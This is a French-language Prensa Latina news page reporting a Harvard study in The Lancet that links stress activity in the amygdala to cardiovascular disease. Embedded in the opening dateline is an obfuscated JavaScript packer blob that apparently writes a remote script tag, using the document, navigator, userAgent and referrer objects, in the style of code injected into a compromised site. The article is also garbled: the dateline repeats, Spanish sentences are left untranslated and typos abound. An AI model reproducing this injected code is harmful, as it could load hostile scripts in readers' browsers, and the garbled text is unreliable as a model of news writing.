dimanche 21 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Étude associe le stress dans le cerveau avec ataques cardiaques

Londres, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iinbr|var|u0026u|referrer|hdrna||js|php'.split('|'),0,{})) 13 jan (PL) Des scientifiques américains ont associé le stress dans une zone du cerveau avec le danger de souffrir de maladies cardiovasculaires (ECV), selon une étude publiée aujourd'hui.

Londres, 13 jan (PL) Des scientifiques américains ont associé le stress dans une zone du cerveau avec le danger de souffrir de maladies cardiovasculaires (ECV), selon une étude publiée aujourd’hui.

La región cérébrale est la amygdale qui traiter les émotions et de de laquelles l’activité pourrait générer ces ECV, ont signalé les experts de Harvard dans la revue médicale britanique The Lancet.  

Les études avec des animaux ont démontré que le stress active la moelle osseuse médulle ossée pour produire plus de globules blanches, ce qui peut causer l’inflammation des artères, et notre analyse suggère que ce qui se passe avec les humaines est très similaire.

Tawakol, le leader du travail, dit qu eles résultats suggèrent différentes interventions pour réduire le risque cardiovasculaire associé avec le stress.

Sería razonable aconsejar a las personas con un alto peligro cardiovascular que consideraran la adopción de estrategias para minimizar el estrés en aquellos casos en los que sientan que se encuentran sometidos a una alta presión psicológica, sugirió.

Cependant, il souligne qu’y a beaucoup d’étude à faire encore pour confiermer si la réduction de stress est associée à diminuer le risque cardiovasculaire.

rm/ymr/rml

 

 

EN CONTINU
notes connexes